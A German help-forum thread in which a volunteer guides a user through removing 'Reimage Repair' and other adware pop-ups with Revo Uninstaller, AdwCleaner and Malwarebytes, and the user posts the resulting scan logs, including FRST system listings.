Error: (02/27/2016 07:09:23 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:07:33 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:07:26 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1644) SRUJet: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Windows\system32\SRU\SRU001D5.log.


Systemfehler:
=============
Error: (02/27/2016 07:58:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_225ba9" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 07:58:57 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 07:12:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_345af" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 07:12:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 06:56:40 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-4RSISKL)
Description: {3EB3C877-1F16-487C-9050-104DBCD66683}

Error: (02/27/2016 06:56:40 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-4RSISKL)
Description: {3EB3C877-1F16-487C-9050-104DBCD66683}

Error: (02/27/2016 06:56:40 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-4RSISKL)
Description: {3EB3C877-1F16-487C-9050-104DBCD66683}

Error: (02/27/2016 06:56:40 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-4RSISKL)
Description: {3EB3C877-1F16-487C-9050-104DBCD66683}

Error: (02/27/2016 06:56:40 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-4RSISKL)
Description: {3EB3C877-1F16-487C-9050-104DBCD66683}

Error: (02/27/2016 06:56:40 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-4RSISKL)
Description: {3EB3C877-1F16-487C-9050-104DBCD66683}


CodeIntegrity:
===================================
  Date: 2016-02-12 03:20:44.853
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-11 12:10:33.797
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-10 11:26:47.553
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-04 08:02:11.501
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-29 03:36:41.152
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-27 07:13:22.396
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 22:14:41.012
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-14 14:19:56.240
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-06 20:51:52.294
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-30 09:20:05.336
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
Prozentuale Nutzung des RAM: 20%
Installierter physikalischer RAM: 8149.34 MB
Verfügbarer physikalischer RAM: 6484.68 MB
Summe virtueller Speicher: 9429.34 MB
Verfügbarer virtueller Speicher: 7778.75 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.92 GB) (Free:601.49 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 143626DE)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=500 MB) - (Type=27)

==================== Ende von Addition.txt ============================
         
__________________

Alt 27.02.2016, 20:19   #4
burningice
/// Malwareteam
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome



Da hab ich jetzt aber schlimmeres erwartet haha. Das haben wir gleich

Schritt 1
Lade Dir bitte von hier Revo Uninstaller Download Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
  • Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
  • Klicke auf Optionen und wähle als Sprache Deutsch.
  • Suche im Uninstallerfeld nach den Programmen:

    Search Quick Know

  • Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

 


Hinweis: Falls bei der Deinstallation zu Beginn ein Fehler auftritt oder du den aufgerufenen Uninstaller nicht bedienen kannst, breche dieses Setup einfach ab und fahre mit der Entfernung durch Revo wie oben beschrieben fort.

Schritt 2
Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).


Schritt 3
Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.



Schritt 4
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

Bitte poste in deiner nächsten Antwort also:
  • Logfile von AdwCleaner
  • Logfile von Malwarebytes
  • Frst.txt
  • Addition.txt
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Alt 27.02.2016, 22:17   #5
Blatt
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome



Ok, hier hab ich die Logs:

adw cleaner
Code:
ATTFilter
# AdwCleaner v5.036 - Bericht erstellt am 27/02/2016 um 21:47:39
# Aktualisiert am 22/02/2016 von Xplode
# Datenbank : 2016-02-27.1 [Server]
# Betriebssystem : Windows 10 Home  (x64)
# Benutzername : Hanns - DESKTOP-4RSISKL
# Gestartet von : C:\Users\Hanns\Downloads\AdwCleaner_5.036.exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****


***** [ Ordner ] *****

[-] Ordner Gelöscht : C:\ProgramData\18ba5432-2243-0
[-] Ordner Gelöscht : C:\ProgramData\18ba5432-70f7-0
[-] Ordner Gelöscht : C:\ProgramData\f46c997e-3181-1
[-] Ordner Gelöscht : C:\ProgramData\f46c997e-4665-0
[-] Ordner Gelöscht : C:\ProgramData\{011f9baa-712c-0}
[-] Ordner Gelöscht : C:\ProgramData\{0125035b-412c-0}
[-] Ordner Gelöscht : C:\ProgramData\{25eac881-312c-1}

***** [ Dateien ] *****


***** [ DLLs ] *****


***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****

[-] Geplante Aufgabe Gelöscht : One System Care Run Delay
[-] Geplante Aufgabe Gelöscht : One System Care Monitor
[-] Geplante Aufgabe Gelöscht : One System Care Task

***** [ Registrierungsdatenbank ] *****

[-] Schlüssel Gelöscht : HKCU\Software\Classes\Applications\inetstat.exe
[-] Schlüssel Gelöscht : HKCU\Software\InetStat
[-] Schlüssel Gelöscht : HKCU\Software\OCS
[-] Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [InetStat]

***** [ Internetbrowser ] *****


*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [1659 Bytes] - [27/02/2016 21:47:39]
C:\AdwCleaner\AdwCleaner[S1].txt - [1561 Bytes] - [27/02/2016 21:46:38]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1805 Bytes] ##########
         
mbam:
Code:
ATTFilter
 Malwarebytes Anti-Malware 
www.malwarebytes.org

Suchlaufdatum: 27.02.2016
Suchlaufzeit: 21:58
Protokolldatei: mbam.txt
Administrator: Ja

Version: 2.2.0.1024
Malware-Datenbank: v2016.02.27.03
Rootkit-Datenbank: v2016.02.27.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Hanns

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 343322
Abgelaufene Zeit: 6 Min., 57 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswerte: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Dateien: 12
PUP.Optional.PricePeep, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.pricepeep00.pricepeep.net_0.localstorage, Löschen bei Neustart, [ded19dc8396092a428286c9ead57dc24], 
PUP.Optional.PricePeep, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.pricepeep00.pricepeep.net_0.localstorage-journal, In Quarantäne, [eec1d49128713204232d7b8f26de8977], 
PUP.Optional.ReMarkable, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_static.re-markable00.re-markable.net_0.localstorage, Löschen bei Neustart, [2d82fd681a7f6ec8aeb18389a75d9070], 
PUP.Optional.ReMarkable, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_static.re-markable00.re-markable.net_0.localstorage-journal, Löschen bei Neustart, [4c639acbf3a6c571025d33d9fa0abd43], 
PUP.Optional.PastaLeads, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_nps.pastaleads.com_0.localstorage, Löschen bei Neustart, [d3dca9bc217894a2560eee3b996ba15f], 
PUP.Optional.PastaLeads, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_nps.pastaleads.com_0.localstorage-journal, Löschen bei Neustart, [cae5c1a47d1ccd6967fd6abf897b3fc1], 
PUP.Optional.BestPriceNinja, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, In Quarantäne, [ffb04a1b5643b0861d9874ec0ff5e11f], 
PUP.Optional.BestPriceNinja, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, In Quarantäne, [367925406a2f4ceab8fd1b456c985ca4], 
PUP.Optional.eShopComp, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Löschen bei Neustart, [a30c1f46b2e742f46835f075689c54ac], 
PUP.Optional.eShopComp, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Löschen bei Neustart, [ac030d580792c1755e3ff273d331ae52], 
PUP.Optional.CrossRider, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Löschen bei Neustart, [c5eaaeb7d8c1e35307f58ddb976d946c], 
PUP.Optional.CrossRider, C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Löschen bei Neustart, [d4dba2c33267350122dafd6b719314ec], 

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
         

FRST.txt.
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
durchgeführt von Hanns (Administrator) auf DESKTOP-4RSISKL (27-02-2016 22:13:41)
Gestartet von C:\Users\Hanns\Downloads
Geladene Profile: Hanns (Verfügbare Profile: Hanns)
Platform: Windows 10 Home Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Spotify Ltd) C:\Users\Hanns\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14021336 2015-06-18] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3014224 2016-02-04] (Valve Corporation)
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [Spotify Web Helper] => C:\Users\Hanns\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-01-31] (Spotify Ltd)
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x00000000

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{59e7dc04-eb0d-4e2b-9b09-a2c228e495f8}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 

FireFox:
========
FF ProfilePath: C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Extension: ProxTube - Unblock YouTube - C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default\Extensions\ich@maltegoetz.de.xpi [2015-12-17]
FF Extension: Adblock Plus - C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-24]

Chrome: 
=======
CHR Profile: C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-01]
CHR Extension: (Google Docs) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-01]
CHR Extension: (Google Drive) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-01]
CHR Extension: (YouTube) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-01]
CHR Extension: (Google-Suche) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-01]
CHR Extension: (Google Tabellen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-02-01]
CHR Extension: (YouTube To MP3!) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgdohmjplligggendhbmghhmpphabopi [2016-02-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-01]
CHR Extension: (Google Mail) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-01]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [350312 2015-09-05] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Datei ist nicht signiert]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223520 2015-07-10] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 e1dexpress; C:\Windows\system32\DRIVERS\e1d65x64.sys [530416 2015-06-18] (Intel Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184608 2015-07-07] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
S3 SIVDriver; C:\Windows\system32\Drivers\SIVX64.sys [159952 2015-11-14] (Ray Hinchliffe)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

